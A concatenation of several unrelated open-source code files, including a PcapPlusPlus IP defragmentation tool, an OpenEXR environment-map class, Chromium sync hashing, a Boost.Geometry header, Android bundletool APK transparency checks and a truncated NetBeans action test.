i32 ShaderNode::getOutputConnectionCount(QtNodes::PortIndex index)
{
i32 count = 0;
for (const QtNodes::Connection* conn : m_outputConnections)
{
if (conn && conn->getPortIndex(QtNodes::PortType::Out) == index)
count++;
}
return count;
}
void ShaderNode::outputConnectionCreated(QtNodes::Connection const& conn)
{
m_outputConnections.push_back(&conn);
}
void ShaderNode::outputConnectionDeleted(QtNodes::Connection const& conn)
{
m_outputConnections.erase(std::remove(m_outputConnections.begin(), m_outputConnections.end(), &conn), m_outputConnections.end());
}
}
#endif
| 2,225 |
1,856 | #include <iostream>
#include <map>
#include <sstream>
#include <stdlib.h>
#include <string.h>
#include "PcapPlusPlusVersion.h"
#include "IPv4Layer.h"
#include "IPv6Layer.h"
#include "IPReassembly.h"
#include "PcapFileDevice.h"
#include "SystemUtils.h"
#include "getopt.h"
#define EXIT_WITH_ERROR(reason) do { \
printUsage(); \
std::cout << std::endl << "ERROR: " << reason << std::endl << std::endl; \
exit(1); \
} while(0)
static struct option DefragUtilOptions[] =
{
{"output-file", required_argument, 0, 'o'},
{"filter-by-ipid", required_argument, 0, 'd'},
{"bpf-filter", required_argument, 0, 'f'},
{"copy-all-packets", no_argument, 0, 'a'},
{"help", no_argument, 0, 'h'},
{"version", no_argument, 0, 'v'},
{0, 0, 0, 0}
};
/**
* A struct for collecting stats during the de-fragmentation process
*/
struct DefragStats
{
int totalPacketsRead;
int ipv4Packets;
int ipv6Packets;
int ipv4PacketsMatchIpIDs;
int ipv6PacketsMatchFragIDs;
int ipPacketsMatchBpfFilter;
int ipv4FragmentsMatched;
int ipv6FragmentsMatched;
int ipv4PacketsDefragmented;
int ipv6PacketsDefragmented;
int totalPacketsWritten;
void clear() { memset(this, 0, sizeof(DefragStats)); }
DefragStats() { clear(); }
};
/**
* Print application usage
*/
void printUsage()
{
std::cout << std::endl
<< "Usage:" << std::endl
<< "------" << std::endl
<< pcpp::AppName::get() << " input_file -o output_file [-d frag_ids] [-f bpf_filter] [-a] [-h] [-v]" << std::endl
<< std::endl
<< "Options:" << std::endl
<< std::endl
<< " input_file : Input pcap/pcapng file" << std::endl
<< " -o output_file : Output file. Output file type (pcap/pcapng) will match the input file type" << std::endl
<< " -d frag_ids : De-fragment only fragments that match this comma-separated list of IP IDs (for IPv4) or" << std::endl
<< " fragment IDs (for IPv6) in decimal format" << std::endl
<< " -f bpf_filter : De-fragment only fragments that match bpf_filter. Filter should be provided in Berkeley Packet Filter (BPF)" << std::endl
<< " syntax (http://biot.com/capstats/bpf.html) i.e: 'ip net 1.1.1.1'" << std::endl
<< " -a : Copy all packets (those who were de-fragmented and those who weren't) to output file" << std::endl
<< " -v : Displays the current version and exits" << std::endl
<< " -h : Displays this help message and exits" << std::endl
<< std::endl;
}
/**
* Print application version
*/
void printAppVersion()
{
std::cout
<< pcpp::AppName::get() << " " << pcpp::getPcapPlusPlusVersionFull() << std::endl
<< "Built: " << pcpp::getBuildDateTime() << std::endl
<< "Built from: " << pcpp::getGitInfo() << std::endl;
exit(0);
}
/**
* This method reads packets from the input file, decided which fragments pass the filters set by the user, de-fragment the fragments
* who pass them, and writes the result packets to the output file
*/
void processPackets(pcpp::IFileReaderDevice* reader, pcpp::IFileWriterDevice* writer,
bool filterByBpf, std::string bpfFilter,
bool filterByIpID, std::map<uint32_t, bool> fragIDs,
bool copyAllPacketsToOutputFile,
DefragStats& stats)
{
pcpp::RawPacket rawPacket;
pcpp::BPFStringFilter filter(bpfFilter);
// create an instance of IPReassembly
pcpp::IPReassembly ipReassembly;
pcpp::IPReassembly::ReassemblyStatus status;
// read all packet from input file
while (reader->getNextPacket(rawPacket))
{
bool defragPacket = true;
stats.totalPacketsRead++;
// if user requested to filter by BPF
if (filterByBpf)
{
// check if packet matches the BPF filter supplied by the user
if (pcpp::IPcapDevice::matchPacketWithFilter(filter, &rawPacket))
{
stats.ipPacketsMatchBpfFilter++;
}
else // if not - set the packet as not marked for de-fragmentation
{
defragPacket = false;
}
}
bool isIPv4Packet = false;
bool isIPv6Packet = false;
// check if packet is of type IPv4 or IPv6
pcpp::Packet parsedPacket(&rawPacket);
if (parsedPacket.isPacketOfType(pcpp::IPv4))
{
stats.ipv4Packets++;
isIPv4Packet = true;
}
else if (parsedPacket.isPacketOfType(pcpp::IPv6))
{
stats.ipv6Packets++;
isIPv6Packet = true;
}
else // if not - set the packet as not marked for de-fragmentation
{
defragPacket = false;
}
// if user requested to filter by IP ID
if (filterByIpID)
{
// get the IPv4 layer
pcpp::IPv4Layer* ipv4Layer = parsedPacket.getLayerOfType<pcpp::IPv4Layer>();
if (ipv4Layer != NULL)
{
// check if packet ID matches one of the IP IDs requested by the user
if (fragIDs.find((uint32_t)pcpp::netToHost16(ipv4Layer->getIPv4Header()->ipId)) != fragIDs.end())
{
stats.ipv4PacketsMatchIpIDs++;
}
else // if not - set the packet as not marked for de-fragmentation
{
defragPacket = false;
}
}
// get the IPv6 layer
pcpp::IPv6Layer* ipv6Layer = parsedPacket.getLayerOfType<pcpp::IPv6Layer>();
if (ipv6Layer != NULL && ipv6Layer->isFragment())
{
// if this packet is a fragment, get the fragmentation header
pcpp::IPv6FragmentationHeader* fragHdr = ipv6Layer->getExtensionOfType<pcpp::IPv6FragmentationHeader>();
// check if fragment ID matches one of the fragment IDs requested by the user
if (fragIDs.find(pcpp::netToHost32(fragHdr->getFragHeader()->id)) != fragIDs.end())
{
stats.ipv6PacketsMatchFragIDs++;
}
else // if not - set the packet as not marked for de-fragmentation
{
defragPacket = false;
}
}
}
// if fragment is marked for de-fragmentation
if (defragPacket)
{
// process the packet in the IP reassembly mechanism
pcpp::Packet* result = ipReassembly.processPacket(&parsedPacket, status);
// write fragment/packet to file if:
// - packet is fully reassembled (status of REASSEMBLED)
// - packet isn't a fragment or isn't an IP packet and the user asked to write all packets to output
if (status == pcpp::IPReassembly::REASSEMBLED ||
((status == pcpp::IPReassembly::NON_IP_PACKET || status == pcpp::IPReassembly::NON_FRAGMENT) && copyAllPacketsToOutputFile))
{
writer->writePacket(*result->getRawPacket());
stats.totalPacketsWritten++;
}
// update statistics if packet is fully reassembled (status of REASSEMBLED) and
if (status == pcpp::IPReassembly::REASSEMBLED)
{
if (isIPv4Packet)
stats.ipv4PacketsDefragmented++;
else if (isIPv6Packet)
stats.ipv6PacketsDefragmented++;
// free packet
delete result;
}
// update statistics if packet isn't fully reassembled
if (status == pcpp::IPReassembly::FIRST_FRAGMENT ||
status == pcpp::IPReassembly::FRAGMENT ||
status == pcpp::IPReassembly::OUT_OF_ORDER_FRAGMENT ||
status == pcpp::IPReassembly::MALFORMED_FRAGMENT ||
status == pcpp::IPReassembly::REASSEMBLED)
{
if (isIPv4Packet)
stats.ipv4FragmentsMatched++;
else if (isIPv6Packet)
stats.ipv6FragmentsMatched++;
}
}
// if packet isn't marked for de-fragmentation but the user asked to write all packets to output file
else if (copyAllPacketsToOutputFile)
{
writer->writePacket(rawPacket);
stats.totalPacketsWritten++;
}
}
}
/**
* A method for printing fragmentation process stats
*/
void printStats(const DefragStats& stats, bool filterByIpID, bool filterByBpf)
{
std::ostringstream stream;
stream << "Summary:\n";
stream << "========\n";
stream << "Total packets read: " << stats.totalPacketsRead << std::endl;
stream << "IPv4 packets read: " << stats.ipv4Packets << std::endl;
stream << "IPv6 packets read: " << stats.ipv6Packets << std::endl;
if (filterByIpID)
{
stream << "IPv4 packets match fragment ID list: " << stats.ipv4PacketsMatchIpIDs << std::endl;
stream << "IPv6 packets match fragment ID list: " << stats.ipv6PacketsMatchFragIDs << std::endl;
}
if (filterByBpf)
stream << "IP packets match BPF filter: " << stats.ipPacketsMatchBpfFilter << std::endl;
stream << "Total fragments matched: " << (stats.ipv4FragmentsMatched + stats.ipv6FragmentsMatched) << std::endl;
stream << "IPv4 fragments matched: " << stats.ipv4FragmentsMatched << std::endl;
stream << "IPv6 fragments matched: " << stats.ipv6FragmentsMatched << std::endl;
stream << "Total packets reassembled: " << (stats.ipv4PacketsDefragmented + stats.ipv6PacketsDefragmented) << std::endl;
stream << "IPv4 packets reassembled: " << stats.ipv4PacketsDefragmented << std::endl;
stream << "IPv6 packets reassembled: " << stats.ipv6PacketsDefragmented << std::endl;
stream << "Total packets written to output file: " << stats.totalPacketsWritten << std::endl;
std::cout << stream.str();
}
/**
* main method of the application
*/
int main(int argc, char* argv[])
{
pcpp::AppName::init(argc, argv);
int optionIndex = 0;
int opt = 0;
std::string outputFile = "";
bool filterByBpfFilter = false;
std::string bpfFilter = "";
bool filterByFragID = false;
std::map<uint32_t, bool> fragIDMap;
bool copyAllPacketsToOutputFile = false;
while((opt = getopt_long(argc, argv, "o:d:f:ahv", DefragUtilOptions, &optionIndex)) != -1)
{
switch (opt)
{
case 0:
{
break;
}
case 'o':
{
outputFile = optarg;
break;
}
case 'd':
{
filterByFragID = true;
// read the IP ID / Frag ID list into the map
fragIDMap.clear();
std::string ipIDsAsString = std::string(optarg);
std::stringstream stream(ipIDsAsString);
std::string ipIDStr;
// break comma-separated string into string list
while(std::getline(stream, ipIDStr, ','))
{
// convert the IP ID to uint16_t
uint32_t fragID = (uint32_t)atoi(ipIDStr.c_str());
// add the frag ID into the map if it doesn't already exist
if (fragIDMap.find(fragID) == fragIDMap.end())
fragIDMap[fragID] = true;
}
// verify list is not empty
if (fragIDMap.empty())
{
EXIT_WITH_ERROR("Couldn't parse fragment ID list");
}
break;
}
case 'f':
{
filterByBpfFilter = true;
bpfFilter = optarg;
pcpp::BPFStringFilter filter(bpfFilter);
if (!filter.verifyFilter())
EXIT_WITH_ERROR("Illegal BPF filter");
break;
}
case 'a':
{
copyAllPacketsToOutputFile = true;
break;
}
case 'h':
{
printUsage();
exit(0);
}
case 'v':
{
printAppVersion();
break;
}
}
}
std::string inputFile = "";
int expectedParams = 1;
int paramIndex = -1;
for (int i = optind; i < argc; i++)
{
paramIndex++;
if (paramIndex > expectedParams)
EXIT_WITH_ERROR("Unexpected parameter: " << argv[i]);
switch (paramIndex)
{
case 0:
{
inputFile = argv[i];
break;
}
default:
EXIT_WITH_ERROR("Unexpected parameter: " << argv[i]);
}
}
if (inputFile == "")
{
EXIT_WITH_ERROR("Input file name was not given");
}
if (outputFile == "")
{
EXIT_WITH_ERROR("Output file name was not given");
}
// create a reader device from input file
pcpp::IFileReaderDevice* reader = pcpp::IFileReaderDevice::getReader(inputFile);
if (!reader->open())
{
EXIT_WITH_ERROR("Error opening input file");
}
// create a writer device for output file in the same file type as input file
pcpp::IFileWriterDevice* writer = NULL;
if (dynamic_cast<pcpp::PcapFileReaderDevice*>(reader) != NULL)
{
writer = new pcpp::PcapFileWriterDevice(outputFile, ((pcpp::PcapFileReaderDevice*)reader)->getLinkLayerType());
}
else if (dynamic_cast<pcpp::PcapNgFileReaderDevice*>(reader) != NULL)
{
writer = new pcpp::PcapNgFileWriterDevice(outputFile);
}
else
{
EXIT_WITH_ERROR("Cannot determine input file type");
}
if (!writer->open())
{
EXIT_WITH_ERROR("Error opening output file");
}
// run the de-fragmentation process
DefragStats stats;
processPackets(reader, writer, filterByBpfFilter, bpfFilter, filterByFragID, fragIDMap, copyAllPacketsToOutputFile, stats);
// close files
reader->close();
writer->close();
// print summary stats to console
printStats(stats, filterByFragID, filterByBpfFilter);
delete reader;
delete writer;
}
| 5,024 |
587 | <gh_stars>100-1000
//
// SPDX-License-Identifier: BSD-3-Clause
// Copyright (c) Contributors to the OpenEXR Project.
//
//-----------------------------------------------------------------------------
//
// class EnvmapImage
//
//-----------------------------------------------------------------------------
#include "EnvmapImage.h"
#include <ImathFun.h>
#include "namespaceAlias.h"
using namespace IMF;
using namespace IMATH;
EnvmapImage::EnvmapImage ()
: _type (ENVMAP_LATLONG)
, _dataWindow (V2i (0, 0), V2i (0, 0))
, _pixels (1, 1)
{
clear ();
}
EnvmapImage::EnvmapImage (Envmap type, const Box2i& dataWindow)
: _type (type)
, _dataWindow (dataWindow)
, _pixels (
dataWindow.max.y - dataWindow.min.y + 1,
dataWindow.max.x - dataWindow.min.x + 1)
{
clear ();
}
void
EnvmapImage::resize (Envmap type, const Box2i& dataWindow)
{
_pixels.resizeEraseUnsafe (
dataWindow.max.y - dataWindow.min.y + 1,
dataWindow.max.x - dataWindow.min.x + 1);
_type = type;
_dataWindow = dataWindow;
clear ();
}
void
EnvmapImage::clear ()
{
int w = _dataWindow.max.x - _dataWindow.min.x + 1;
int h = _dataWindow.max.y - _dataWindow.min.y + 1;
for (int y = 0; y < h; ++y)
{
for (int x = 0; x < w; ++x)
{
Rgba& p = _pixels[y][x];
p.r = 0;
p.g = 0;
p.b = 0;
p.a = 0;
}
}
}
Envmap
EnvmapImage::type () const
{
return _type;
}
const Box2i&
EnvmapImage::dataWindow () const
{
return _dataWindow;
}
Array2D<Rgba>&
EnvmapImage::pixels ()
{
return _pixels;
}
const Array2D<Rgba>&
EnvmapImage::pixels () const
{
return _pixels;
}
namespace
{
V2f
dirToPosLatLong (const Box2i& dataWindow, const V3f& dir)
{
return LatLongMap::pixelPosition (dataWindow, dir);
}
V2f
dirToPosCube (const Box2i& dataWindow, const V3f& dir)
{
CubeMapFace face;
V2f posInFace;
CubeMap::faceAndPixelPosition (dir, dataWindow, face, posInFace);
return CubeMap::pixelPosition (face, dataWindow, posInFace);
}
} // namespace
Rgba
EnvmapImage::filteredLookup (V3f d, float r, int n) const
{
//
// Filtered environment map lookup: Take n by n point samples
// from the environment map, clustered around direction d, and
// combine the samples with a tent filter.
//
//
// Depending on the type of map, pick an appropriate function
// to convert 3D directions to 2D pixel poitions.
//
V2f (*dirToPos) (const Box2i&, const V3f&);
if (_type == ENVMAP_LATLONG)
dirToPos = dirToPosLatLong;
else
dirToPos = dirToPosCube;
//
// Pick two vectors, dx and dy, of length r, that are orthogonal
// to the lookup direction, d, and to each other.
//
d.normalize ();
V3f dx, dy;
if (abs (d.x) > 0.707f)
dx = (d % V3f (0, 1, 0)).normalized () * r;
else
dx = (d % V3f (1, 0, 0)).normalized () * r;
dy = (d % dx).normalized () * r;
//
// Take n by n point samples from the map, and add them up.
// The directions for the point samples are all within the pyramid
// defined by the vectors d-dy-dx, d-dy+dx, d+dy-dx, d+dy+dx.
//
float wt = 0;
float cr = 0;
float cg = 0;
float cb = 0;
float ca = 0;
for (int y = 0; y < n; ++y)
{
float ry = float (2 * y + 2) / float (n + 1) - 1;
float wy = 1 - abs (ry);
V3f ddy (ry * dy);
for (int x = 0; x < n; ++x)
{
float rx = float (2 * x + 2) / float (n + 1) - 1;
float wx = 1 - abs (rx);
V3f ddx (rx * dx);
Rgba s = sample (dirToPos (_dataWindow, d + ddx + ddy));
float w = wx * wy;
wt += w;
cr += s.r * w;
cg += s.g * w;
cb += s.b * w;
ca += s.a * w;
}
}
wt = 1 / wt;
Rgba c;
c.r = cr * wt;
c.g = cg * wt;
c.b = cb * wt;
c.a = ca * wt;
return c;
}
Rgba
EnvmapImage::sample (const V2f& pos) const
{
//
// Point-sample the environment map image at 2D position pos.
// Interpolate bilinearly between the four nearest pixels.
//
int x1 = IMATH::floor (pos.x);
int x2 = x1 + 1;
float sx = x2 - pos.x;
float tx = 1 - sx;
x1 = clamp (x1, _dataWindow.min.x, _dataWindow.max.x) - _dataWindow.min.x;
x2 = clamp (x2, _dataWindow.min.x, _dataWindow.max.x) - _dataWindow.min.x;
int y1 = IMATH::floor (pos.y);
int y2 = y1 + 1;
float sy = y2 - pos.y;
float ty = 1 - sy;
y1 = clamp (y1, _dataWindow.min.y, _dataWindow.max.y) - _dataWindow.min.y;
y2 = clamp (y2, _dataWindow.min.y, _dataWindow.max.y) - _dataWindow.min.y;
Rgba p11 = _pixels[y1][x1];
Rgba p12 = _pixels[y1][x2];
Rgba p21 = _pixels[y2][x1];
Rgba p22 = _pixels[y2][x2];
Rgba p;
p.r = (p11.r * sx + p12.r * tx) * sy + (p21.r * sx + p22.r * tx) * ty;
p.g = (p11.g * sx + p12.g * tx) * sy + (p21.g * sx + p22.g * tx) * ty;
p.b = (p11.b * sx + p12.b * tx) * sy + (p21.b * sx + p22.b * tx) * ty;
p.a = (p11.a * sx + p12.a * tx) * sy + (p21.a * sx + p22.a * tx) * ty;
return p;
}
| 2,521 |
2,151 | <reponame>google-ar/chromium
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "components/sync/base/hash_util.h"
#include "base/base64.h"
#include "base/sha1.h"
#include "components/sync/protocol/sync.pb.h"
namespace syncer {
std::string GenerateSyncableHash(ModelType model_type,
const std::string& client_tag) {
// Blank PB with just the field in it has termination symbol,
// handy for delimiter.
sync_pb::EntitySpecifics serialized_type;
AddDefaultFieldValue(model_type, &serialized_type);
std::string hash_input;
serialized_type.AppendToString(&hash_input);
hash_input.append(client_tag);
std::string encode_output;
base::Base64Encode(base::SHA1HashString(hash_input), &encode_output);
return encode_output;
}
std::string GenerateSyncableBookmarkHash(
const std::string& originator_cache_guid,
const std::string& originator_client_item_id) {
return GenerateSyncableHash(
BOOKMARKS, originator_cache_guid + originator_client_item_id);
}
} // namespace syncer
| 410 |
326 | // Boost.Geometry
// Copyright (c) 2021, Oracle and/or its affiliates.
// Contributed and/or modified by <NAME>, on behalf of Oracle
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
#ifndef BOOST_GEOMETRY_ALGORITHMS_DETAIL_ENVELOPE_GEOMETRY_COLLECTION_HPP
#define BOOST_GEOMETRY_ALGORITHMS_DETAIL_ENVELOPE_GEOMETRY_COLLECTION_HPP
#include <boost/geometry/algorithms/detail/visit.hpp>
#include <boost/geometry/algorithms/dispatch/envelope.hpp>
#include <boost/geometry/algorithms/is_empty.hpp>
#include <boost/geometry/core/tags.hpp>
namespace boost { namespace geometry
{
#ifndef DOXYGEN_NO_DISPATCH
namespace dispatch
{
template <typename Collection>
struct envelope<Collection, geometry_collection_tag>
{
template <typename Geometry, typename Box, typename Strategy>
static inline void apply(Geometry const& geometry,
Box& mbr,
Strategy const& strategy)
{
using strategy_t = decltype(strategy.envelope(geometry, mbr));
using state_t = typename strategy_t::template multi_state<Box>;
state_t state;
detail::visit_breadth_first([&](auto const& g)
{
if (! geometry::is_empty(g))
{
Box b;
envelope<util::remove_cref_t<decltype(g)>>::apply(g, b, strategy);
state.apply(b);
}
return true;
}, geometry);
state.result(mbr);
}
};
} // namespace dispatch
#endif // DOXYGEN_NO_DISPATCH
}} // namespace boost::geometry
#endif // BOOST_GEOMETRY_ALGORITHMS_DETAIL_ENVELOPE_GEOMETRY_COLLECTION_HPP
| 761 |
2,594 | /*
* Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License
*/
package com.android.tools.build.bundletool.transparency;
import static com.google.common.collect.ImmutableMap.toImmutableMap;
import static com.google.common.collect.ImmutableSet.toImmutableSet;
import com.android.bundle.CodeTransparencyOuterClass.CodeRelatedFile;
import com.android.bundle.CodeTransparencyOuterClass.CodeTransparency;
import com.android.tools.build.bundletool.model.BundleMetadata;
import com.android.tools.build.bundletool.model.exceptions.InvalidCommandException;
import com.android.tools.build.bundletool.model.utils.ZipUtils;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.ImmutableSet;
import com.google.common.hash.Hashing;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Path;
import java.util.Optional;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;
import org.jose4j.jws.JsonWebSignature;
/** Helper class for verifying code transparency for a given set of device-specific APKs. */
public final class ApkTransparencyCheckUtils {
private static final String TRANSPARENCY_FILE_ZIP_ENTRY_NAME =
"META-INF/" + BundleMetadata.TRANSPARENCY_SIGNED_FILE_NAME;
public static TransparencyCheckResult checkTransparency(ImmutableList<Path> deviceSpecificApks) {
Optional<Path> baseApkPath = getBaseApkPath(deviceSpecificApks);
if (!baseApkPath.isPresent()) {
throw InvalidCommandException.builder()
.withInternalMessage(
"The provided list of device specific APKs must either contain a single APK, or, if"
+ " multiple APK files are present, base.apk file.")
.build();
}
TransparencyCheckResult.Builder result = TransparencyCheckResult.builder();
ApkSignatureVerifier.Result apkSignatureVerificationResult =
ApkSignatureVerifier.verify(deviceSpecificApks);
if (!apkSignatureVerificationResult.verified()) {
return result
.errorMessage("Verification failed: " + apkSignatureVerificationResult.getErrorMessage())
.build();
}
result.apkSigningKeyCertificateFingerprint(
apkSignatureVerificationResult.getApkSigningKeyCertificateFingerprint());
try (ZipFile baseApkFile = ZipUtils.openZipFile(baseApkPath.get())) {
Optional<ZipEntry> transparencyFileEntry =
Optional.ofNullable(baseApkFile.getEntry(TRANSPARENCY_FILE_ZIP_ENTRY_NAME));
if (!transparencyFileEntry.isPresent()) {
throw InvalidCommandException.builder()
.withInternalMessage(
"Could not verify code transparency because transparency file is not present in the"
+ " APK.")
.build();
}
JsonWebSignature jws =
CodeTransparencyCryptoUtils.parseJws(
ZipUtils.asByteSource(baseApkFile, transparencyFileEntry.get()));
boolean signatureVerified = CodeTransparencyCryptoUtils.verifySignature(jws);
if (!signatureVerified) {
return result
.errorMessage("Verification failed because code transparency signature is invalid.")
.build();
}
result
.transparencySignatureVerified(true)
.transparencyKeyCertificateFingerprint(
CodeTransparencyCryptoUtils.getCertificateFingerprint(jws));
CodeTransparency codeTransparencyMetadata =
CodeTransparencyFactory.parseFrom(jws.getUnverifiedPayload());
CodeTransparencyVersion.checkVersion(codeTransparencyMetadata);
ImmutableSet<String> pathsToModifiedFiles =
getModifiedFiles(codeTransparencyMetadata, deviceSpecificApks);
result.fileContentsVerified(pathsToModifiedFiles.isEmpty());
if (!pathsToModifiedFiles.isEmpty()) {
result.errorMessage(
"Verification failed because code was modified after code transparency metadata"
+ " generation. Modified files: "
+ pathsToModifiedFiles);
}
return result.build();
} catch (IOException e) {
throw new UncheckedIOException("An error occurred when processing the file.", e);
}
}
private static Optional<Path> getBaseApkPath(ImmutableList<Path> apkPaths) {
// If only 1 APK is present, it is assumed to be a universal or standalone APK.
if (apkPaths.size() == 1) {
return apkPaths.get(0).getFileName().toString().endsWith(".apk")
? Optional.of(apkPaths.get(0))
: Optional.empty();
}
return apkPaths.stream()
.filter(apkPath -> apkPath.getFileName().toString().equals("base.apk"))
.findAny();
}
private static ImmutableSet<String> getModifiedFiles(
CodeTransparency codeTransparencyMetadata, ImmutableList<Path> allApkPaths) {
ImmutableSet.Builder<String> pathsToModifiedFilesBuilder = ImmutableSet.builder();
for (Path apkPath : allApkPaths) {
try (ZipFile apkFile = ZipUtils.openZipFile(apkPath)) {
pathsToModifiedFilesBuilder.addAll(getModifiedDexFiles(apkFile, codeTransparencyMetadata));
pathsToModifiedFilesBuilder.addAll(
getModifiedNativeLibraries(apkFile, codeTransparencyMetadata));
} catch (IOException e) {
throw new UncheckedIOException(e);
}
}
return pathsToModifiedFilesBuilder.build();
}
private static ImmutableSet<String> getModifiedDexFiles(
ZipFile apkFile, CodeTransparency codeTransparencyMetadata) {
ImmutableSet<String> expectedDexFiles = getDexFiles(codeTransparencyMetadata);
ImmutableSet.Builder<String> pathsToModifiedFilesBuilder = ImmutableSet.builder();
apkFile.stream()
.forEach(
zipEntry -> {
String fileHash = getFileHash(apkFile, zipEntry);
if (isDexFile(zipEntry) && !expectedDexFiles.contains(fileHash)) {
pathsToModifiedFilesBuilder.add(zipEntry.getName());
}
});
return pathsToModifiedFilesBuilder.build();
}
private static ImmutableSet<String> getModifiedNativeLibraries(
ZipFile apkFile, CodeTransparency codeTransparencyMetadata) {
ImmutableMap<String, String> expectedNativeLibrariesByApkPath =
getNativeLibrariesByApkPath(codeTransparencyMetadata);
ImmutableSet.Builder<String> pathsToModifiedFilesBuilder = ImmutableSet.builder();
apkFile.stream()
.forEach(
zipEntry -> {
String fileHash = getFileHash(apkFile, zipEntry);
if (isNativeLibrary(zipEntry)
&& !Optional.ofNullable(expectedNativeLibrariesByApkPath.get(zipEntry.getName()))
.equals(Optional.of(fileHash))) {
pathsToModifiedFilesBuilder.add(zipEntry.getName());
}
});
return pathsToModifiedFilesBuilder.build();
}
private static ImmutableSet<String> getDexFiles(CodeTransparency codeTransparency) {
return codeTransparency.getCodeRelatedFileList().stream()
.filter(ApkTransparencyCheckUtils::isDexFile)
.map(CodeRelatedFile::getSha256)
.collect(toImmutableSet());
}
private static ImmutableMap<String, String> getNativeLibrariesByApkPath(
CodeTransparency codeTransparency) {
return codeTransparency.getCodeRelatedFileList().stream()
.filter(
codeRelatedFile ->
codeRelatedFile.getType().equals(CodeRelatedFile.Type.NATIVE_LIBRARY))
.collect(toImmutableMap(CodeRelatedFile::getApkPath, CodeRelatedFile::getSha256));
}
private static boolean isDexFile(ZipEntry zipEntry) {
return zipEntry.getName().endsWith(".dex");
}
private static boolean isDexFile(CodeRelatedFile codeRelatedFile) {
return codeRelatedFile.getType().equals(CodeRelatedFile.Type.DEX)
// Code transparency files generated using Bundletool with version older than
// 1.8.1 do not have type field set for dex files.
|| (codeRelatedFile.getType().equals(CodeRelatedFile.Type.TYPE_UNSPECIFIED)
&& codeRelatedFile.getPath().endsWith(".dex"));
}
private static boolean isNativeLibrary(ZipEntry zipEntry) {
return zipEntry.getName().endsWith(".so");
}
private static String getFileHash(ZipFile apkFile, ZipEntry zipEntry) {
try {
return ZipUtils.asByteSource(apkFile, zipEntry).hash(Hashing.sha256()).toString();
} catch (IOException e) {
throw new UncheckedIOException(e);
}
}
private ApkTransparencyCheckUtils() {}
}
| 3,320 |
988 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.openide.awt;
import java.awt.EventQueue;
import java.awt.event.ActionEvent;
import java.beans.PropertyChangeEvent;
import java.beans.PropertyChangeListener;
import java.beans.PropertyChangeSupport;
import java.lang.ref.WeakReference;
import java.lang.reflect.InvocationTargetException;
import java.net.URL;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import javax.swing.AbstractAction;
import javax.swing.Action;
import javax.swing.ActionMap;
import org.netbeans.junit.NbTestCase;
import org.openide.filesystems.FileObject;
import org.openide.filesystems.FileUtil;
import org.openide.util.ContextAwareAction;
import org.openide.util.ContextGlobalProvider;
import org.openide.util.Lookup;
import org.openide.util.Utilities;
import org.openide.util.lookup.AbstractLookup;
import org.openide.util.lookup.InstanceContent;
import org.openide.util.lookup.Lookups;
import org.openide.util.lookup.ProxyLookup;
import org.openide.util.test.MockLookup;
/** Test that cookie actions are in fact sensitive to the correct cookies in the
* correct numbers, and that changes to either node selection or cookies on the
* selected nodes trigger a change in the selected state.
* @author <NAME>
*/
public class ContextActionTest extends NbTestCase
implements Lookup.Provider, ContextActionEnabler<ContextActionTest.Openable> {
public ContextActionTest(String name) {
super(name);
}
private Lookup lookup;
private Lookup lookupProxy;
private ContextAwareAction a1, a2, any, each, all;
private LookupWithOpenable n1, n2;
private Lookup n3, n4;
private int expectedEnabledmentCount = 2;
private static class CGP implements ContextGlobalProvider, Lookup.Provider {
private final Lookup prx = Lookups.proxy(this);
volatile Lookup current;
@Override
public Lookup createGlobalContext() {
return prx;
}
@Override
public Lookup getLookup() {
Lookup c = current;
return c != null ? c : Lookup.EMPTY;
}
}
static CGP actionLookup = new CGP();
@Override
protected void setUp() throws Exception {
lookup = Lookup.EMPTY;
lookupProxy = Lookups.proxy(this);
a1 = context(new SimpleCookieAction(), null, ContextSelection.EXACTLY_ONE, lookupProxy, Openable.class);
a2 = context(new SimpleCookieAction(), this, ContextSelection.ANY, lookupProxy, Openable.class);
any = context(new SimpleCookieAction(), null, ContextSelection.ANY, lookupProxy, Openable.class);
each = context(new SimpleCookieAction(), null, ContextSelection.EACH, lookupProxy, Openable.class);
all = context(new SimpleCookieAction(), null, ContextSelection.ALL, lookupProxy, Openable.class);
n1 = new LookupWithOpenable();
n2 = new LookupWithOpenable();
n3 = new LookupWithOpenable(false);
n4 = new LookupWithOpenable(n1.lookup(Openable.class)); // share the same cookie instance with n1
SimpleCookieAction.runOn.clear();
actionLookup.current = lookupProxy;
MockLookup.setLookup(Lookups.metaInfServices(getClass().getClassLoader()),
lookupProxy,
Lookups.fixed(actionLookup));
}
@Override
protected void tearDown() throws Exception {
actionLookup.current = null;
super.tearDown();
}
@Override
protected boolean runInEQ() {
return true;
}
public void testFilterOutDuplicates() throws Exception {
// Check enablement logic.
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
a1.addPropertyChangeListener(l);
assertFalse(getIsEnabled(a1));
final int[] cnt = { 0 };
class O implements Openable {
@Override
public void open() {
cnt[0]++;
}
}
O o = new O();
activate(Lookups.fixed(o, o));
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
doActionPerformed(a1, new ActionEvent(this, 0, ""));
assertEquals("One invocation", 1, cnt[0]);
}
